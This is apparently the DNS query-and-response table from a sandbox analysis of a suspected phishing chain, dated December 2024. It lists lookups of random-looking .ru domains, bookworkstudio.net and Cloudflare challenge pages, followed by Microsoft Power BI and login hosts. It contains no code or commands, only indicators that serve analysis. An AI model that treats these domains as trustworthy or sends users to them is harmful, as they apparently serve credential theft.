                                                                                                                                                                                                          Dec 12, 2024 00:29:13.124707937 CET192.168.2.41.1.1.10xe4c1Standard query (0)mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.124819040 CET192.168.2.41.1.1.10x72fbStandard query (0)mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.955416918 CET192.168.2.41.1.1.10xb3d7Standard query (0)mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.955564022 CET192.168.2.41.1.1.10x9cd0Standard query (0)mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:43.676898956 CET192.168.2.41.1.1.10xebd2Standard query (0)cdn.botframework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:43.676898956 CET192.168.2.41.1.1.10x4d64Standard query (0)cdn.botframework.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:45.935278893 CET192.168.2.41.1.1.10xd63fStandard query (0)play.vidyard.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:45.935636044 CET192.168.2.41.1.1.10xf485Standard query (0)play.vidyard.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:48.884329081 CET192.168.2.41.1.1.10xd13aStandard query (0)play.vidyard.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:48.884459019 CET192.168.2.41.1.1.10x1e89Standard query (0)play.vidyard.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:50.134557009 CET192.168.2.41.1.1.10x4e32Standard query (0)app.powerbi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:50.134754896 CET192.168.2.41.1.1.10x7416Standard query (0)app.powerbi.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.158050060 CET192.168.2.41.1.1.10xf5ffStandard query (0)app.powerbi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.158174992 CET192.168.2.41.1.1.10x7d28Standard query (0)app.powerbi.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:52.696719885 CET192.168.2.41.1.1.10xc424Standard query (0)cdn.botframework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:52.696849108 CET192.168.2.41.1.1.10x5f07Standard query (0)cdn.botframework.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.222455025 CET192.168.2.41.1.1.10x700cStandard query (0)api.powerbi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.222620964 CET192.168.2.41.1.1.10x4c55Standard query (0)api.powerbi.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.236953974 CET192.168.2.41.1.1.10x9e12Standard query (0)content.powerapps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.237185001 CET192.168.2.41.1.1.10x14cdStandard query (0)content.powerapps.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.114803076 CET192.168.2.41.1.1.10x14bdStandard query (0)content.powerapps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.114918947 CET192.168.2.41.1.1.10xd2b1Standard query (0)content.powerapps.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.559132099 CET192.168.2.41.1.1.10x827bStandard query (0)app.powerbi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.559468985 CET192.168.2.41.1.1.10xb8a8Standard query (0)app.powerbi.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.087944984 CET192.168.2.41.1.1.10x97b2Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.088114977 CET192.168.2.41.1.1.10x7ae1Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.139406919 CET192.168.2.41.1.1.10xa7a3Standard query (0)dc.services.visualstudio.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.139595032 CET192.168.2.41.1.1.10x7cadStandard query (0)dc.services.visualstudio.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:19.963387966 CET192.168.2.41.1.1.10x6d2eStandard query (0)dc.services.visualstudio.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:19.963509083 CET192.168.2.41.1.1.10x8001Standard query (0)dc.services.visualstudio.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:22.211584091 CET192.168.2.41.1.1.10x89f8Standard query (0)dc.services.visualstudio.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:22.211860895 CET192.168.2.41.1.1.10xbfc1Standard query (0)dc.services.visualstudio.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:24.817059040 CET192.168.2.41.1.1.10x513aStandard query (0)dc.services.visualstudio.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:24.817230940 CET192.168.2.41.1.1.10x9c94Standard query (0)dc.services.visualstudio.com65IN (0x0001)false
                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                          Dec 12, 2024 00:28:41.731462955 CET1.1.1.1192.168.2.40x4d35No error (0)bookworkstudio.net69.49.245.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:43.601829052 CET1.1.1.1192.168.2.40x6023No error (0)bookworkstudio.net69.49.245.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:43.601845026 CET1.1.1.1192.168.2.40x6376No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:44.608649969 CET1.1.1.1192.168.2.40x584dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:44.608649969 CET1.1.1.1192.168.2.40x584dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:45.909849882 CET1.1.1.1192.168.2.40xa893No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:45.915079117 CET1.1.1.1192.168.2.40x12dNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:46.725080967 CET1.1.1.1192.168.2.40x297cNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:46.725080967 CET1.1.1.1192.168.2.40x297cNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:46.725097895 CET1.1.1.1192.168.2.40xc23fNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.106504917 CET1.1.1.1192.168.2.40x55ccNo error (0)21.zomelore.ru104.21.73.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.106504917 CET1.1.1.1192.168.2.40x55ccNo error (0)21.zomelore.ru172.67.188.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.133666039 CET1.1.1.1192.168.2.40xf197No error (0)21.zomelore.ru65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.715435982 CET1.1.1.1192.168.2.40xcff8No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.715435982 CET1.1.1.1192.168.2.40xcff8No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.715521097 CET1.1.1.1192.168.2.40xec52No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.715521097 CET1.1.1.1192.168.2.40xec52No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.715521097 CET1.1.1.1192.168.2.40xec52No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.715521097 CET1.1.1.1192.168.2.40xec52No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.716005087 CET1.1.1.1192.168.2.40xc940No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.716017962 CET1.1.1.1192.168.2.40xe5e5No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.716017962 CET1.1.1.1192.168.2.40xe5e5No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.716370106 CET1.1.1.1192.168.2.40x7fa0No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.971786976 CET1.1.1.1192.168.2.40xf8dNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.971786976 CET1.1.1.1192.168.2.40xf8dNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.971786976 CET1.1.1.1192.168.2.40xf8dNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.971786976 CET1.1.1.1192.168.2.40xf8dNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.497577906 CET1.1.1.1192.168.2.40xa969No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.497803926 CET1.1.1.1192.168.2.40x83b0No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.497803926 CET1.1.1.1192.168.2.40x83b0No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.563009977 CET1.1.1.1192.168.2.40x76f5No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.563009977 CET1.1.1.1192.168.2.40x76f5No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.564400911 CET1.1.1.1192.168.2.40x1770No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.396296024 CET1.1.1.1192.168.2.40xed72No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.600188971 CET1.1.1.1192.168.2.40xe4c1No error (0)mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru172.67.189.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.600188971 CET1.1.1.1192.168.2.40xe4c1No error (0)mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru104.21.65.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.600235939 CET1.1.1.1192.168.2.40x72fbNo error (0)mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:17.093070030 CET1.1.1.1192.168.2.40x9cd0No error (0)mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:17.093115091 CET1.1.1.1192.168.2.40xb3d7No error (0)mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru104.21.65.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:17.093115091 CET1.1.1.1192.168.2.40xb3d7No error (0)mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru172.67.189.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:41.181757927 CET1.1.1.1192.168.2.40xcb6dNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:41.182070017 CET1.1.1.1192.168.2.40x8834No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:41.182070017 CET1.1.1.1192.168.2.40x8834No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:41.182070017 CET1.1.1.1192.168.2.40x8834No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:43.813755989 CET1.1.1.1192.168.2.40xebd2No error (0)cdn.botframework.combot-framework.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:43.814126968 CET1.1.1.1192.168.2.40x4d64No error (0)cdn.botframework.combot-framework.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:43.816966057 CET1.1.1.1192.168.2.40xa5b4No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:43.816966057 CET1.1.1.1192.168.2.40xa5b4No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:43.816966057 CET1.1.1.1192.168.2.40xa5b4No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:43.817797899 CET1.1.1.1192.168.2.40xf7afNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:46.329040051 CET1.1.1.1192.168.2.40xf485No error (0)play.vidyard.comp.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:46.330204964 CET1.1.1.1192.168.2.40xd63fNo error (0)play.vidyard.comp.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:49.023793936 CET1.1.1.1192.168.2.40xd13aNo error (0)play.vidyard.comp.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:49.023866892 CET1.1.1.1192.168.2.40x1e89No error (0)play.vidyard.comp.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.184029102 CET1.1.1.1192.168.2.40x7416No error (0)app.powerbi.comapp.privatelink.analysis.windows.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.184029102 CET1.1.1.1192.168.2.40x7416No error (0)app.privatelink.analysis.windows.net997de1ee-c405-4364-8b90-eb6f601a6af2.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.184029102 CET1.1.1.1192.168.2.40x7416No error (0)app-pbi-wfe-uae-north-primary-v3.pbi-wfe-uae-north-primary-v3-ase.p.azurewebsites.netwaws-prod-dxb-b24c6da5.sip.p.azurewebsites.windows.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.184329987 CET1.1.1.1192.168.2.40x4e32No error (0)app.powerbi.comapp.privatelink.analysis.windows.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.184329987 CET1.1.1.1192.168.2.40x4e32No error (0)app.privatelink.analysis.windows.net997de1ee-c405-4364-8b90-eb6f601a6af2.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.184329987 CET1.1.1.1192.168.2.40x4e32No error (0)app-pbi-wfe-uae-north-primary-v3.pbi-wfe-uae-north-primary-v3-ase.p.azurewebsites.netwaws-prod-dxb-b24c6da5.sip.p.azurewebsites.windows.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.184329987 CET1.1.1.1192.168.2.40x4e32No error (0)waws-prod-dxb-b24c6da5.sip.p.azurewebsites.windows.net20.38.136.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.296854973 CET1.1.1.1192.168.2.40xf5ffNo error (0)app.powerbi.comapp.privatelink.analysis.windows.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.296854973 CET1.1.1.1192.168.2.40xf5ffNo error (0)app.privatelink.analysis.windows.net997de1ee-c405-4364-8b90-eb6f601a6af2.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.296854973 CET1.1.1.1192.168.2.40xf5ffNo error (0)app-pbi-wfe-uae-north-primary-v3.pbi-wfe-uae-north-primary-v3-ase.p.azurewebsites.netwaws-prod-dxb-b24c6da5.sip.p.azurewebsites.windows.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.296854973 CET1.1.1.1192.168.2.40xf5ffNo error (0)waws-prod-dxb-b24c6da5.sip.p.azurewebsites.windows.net20.38.136.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.296864986 CET1.1.1.1192.168.2.40x7d28No error (0)app.powerbi.comapp.privatelink.analysis.windows.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.296864986 CET1.1.1.1192.168.2.40x7d28No error (0)app.privatelink.analysis.windows.net997de1ee-c405-4364-8b90-eb6f601a6af2.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.296864986 CET1.1.1.1192.168.2.40x7d28No error (0)app-pbi-wfe-uae-north-primary-v3.pbi-wfe-uae-north-primary-v3-ase.p.azurewebsites.netwaws-prod-dxb-b24c6da5.sip.p.azurewebsites.windows.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:52.833466053 CET1.1.1.1192.168.2.40x5f07No error (0)cdn.botframework.combot-framework.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:52.834202051 CET1.1.1.1192.168.2.40xc424No error (0)cdn.botframework.combot-framework.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.830075026 CET1.1.1.1192.168.2.40x700cNo error (0)api.powerbi.comapi.privatelink.analysis.windows.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.830075026 CET1.1.1.1192.168.2.40x700cNo error (0)api.privatelink.analysis.windows.net03be66dd-3487-4b89-a8d9-89ade6381a91.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.830075026 CET1.1.1.1192.168.2.40x700cNo error (0)wabi-uae-north-a-primary-redirect.analysis.windows.netwabi-uae-north-a-primary-comp-ev2.uaenorth.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.830360889 CET1.1.1.1192.168.2.40x4c55No error (0)api.powerbi.comapi.privatelink.analysis.windows.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.830360889 CET1.1.1.1192.168.2.40x4c55No error (0)api.privatelink.analysis.windows.net03be66dd-3487-4b89-a8d9-89ade6381a91.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.830360889 CET1.1.1.1192.168.2.40x4c55No error (0)wabi-uae-north-a-primary-redirect.analysis.windows.netwabi-uae-north-a-primary-comp-ev2.uaenorth.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.911233902 CET1.1.1.1192.168.2.40x14cdNo error (0)content.powerapps.compa-static.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.934243917 CET1.1.1.1192.168.2.40x9e12No error (0)content.powerapps.compa-static.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.934243917 CET1.1.1.1192.168.2.40x9e12No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.934243917 CET1.1.1.1192.168.2.40x9e12No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.252152920 CET1.1.1.1192.168.2.40x14bdNo error (0)content.powerapps.compa-static.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.252152920 CET1.1.1.1192.168.2.40x14bdNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.252152920 CET1.1.1.1192.168.2.40x14bdNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.252834082 CET1.1.1.1192.168.2.40xd2b1No error (0)content.powerapps.compa-static.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.699407101 CET1.1.1.1192.168.2.40x827bNo error (0)app.powerbi.comapp.privatelink.analysis.windows.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.699407101 CET1.1.1.1192.168.2.40x827bNo error (0)app.privatelink.analysis.windows.net997de1ee-c405-4364-8b90-eb6f601a6af2.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.699407101 CET1.1.1.1192.168.2.40x827bNo error (0)app-pbi-wfe-uae-north-primary-v3.pbi-wfe-uae-north-primary-v3-ase.p.azurewebsites.netwaws-prod-dxb-b24c6da5.sip.p.azurewebsites.windows.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.699407101 CET1.1.1.1192.168.2.40x827bNo error (0)waws-prod-dxb-b24c6da5.sip.p.azurewebsites.windows.net20.38.136.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.700632095 CET1.1.1.1192.168.2.40xb8a8No error (0)app.powerbi.comapp.privatelink.analysis.windows.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.700632095 CET1.1.1.1192.168.2.40xb8a8No error (0)app.privatelink.analysis.windows.net997de1ee-c405-4364-8b90-eb6f601a6af2.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.700632095 CET1.1.1.1192.168.2.40xb8a8No error (0)app-pbi-wfe-uae-north-primary-v3.pbi-wfe-uae-north-primary-v3-ase.p.azurewebsites.netwaws-prod-dxb-b24c6da5.sip.p.azurewebsites.windows.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.227915049 CET1.1.1.1192.168.2.40x97b2No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.229156017 CET1.1.1.1192.168.2.40x7ae1No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.278105021 CET1.1.1.1192.168.2.40xa7a3No error (0)dc.services.visualstudio.comdc.applicationinsights.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.278105021 CET1.1.1.1192.168.2.40xa7a3No error (0)dc.applicationinsights.azure.comglobal.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.278105021 CET1.1.1.1192.168.2.40xa7a3No error (0)global.in.ai.monitor.azure.comglobal.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.278105021 CET1.1.1.1192.168.2.40xa7a3No error (0)global.in.ai.privatelink.monitor.azure.comdc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.278105021 CET1.1.1.1192.168.2.40xa7a3No error (0)westeurope-global.in.applicationinsights.azure.comgig-ai-prod-westeurope-global.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.280458927 CET1.1.1.1192.168.2.40x7cadNo error (0)dc.services.visualstudio.comdc.applicationinsights.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.280458927 CET1.1.1.1192.168.2.40x7cadNo error (0)dc.applicationinsights.azure.comglobal.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.280458927 CET1.1.1.1192.168.2.40x7cadNo error (0)global.in.ai.monitor.azure.comglobal.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.280458927 CET1.1.1.1192.168.2.40x7cadNo error (0)global.in.ai.privatelink.monitor.azure.comdc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.280458927 CET1.1.1.1192.168.2.40x7cadNo error (0)westeurope-global.in.applicationinsights.azure.comgig-ai-prod-westeurope-global.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:18.286974907 CET1.1.1.1192.168.2.40x9c0eNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:18.286974907 CET1.1.1.1192.168.2.40x9c0eNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.103652000 CET1.1.1.1192.168.2.40x6d2eNo error (0)dc.services.visualstudio.comdc.applicationinsights.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.103652000 CET1.1.1.1192.168.2.40x6d2eNo error (0)dc.applicationinsights.azure.comglobal.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.103652000 CET1.1.1.1192.168.2.40x6d2eNo error (0)global.in.ai.monitor.azure.comglobal.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.103652000 CET1.1.1.1192.168.2.40x6d2eNo error (0)global.in.ai.privatelink.monitor.azure.comdc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
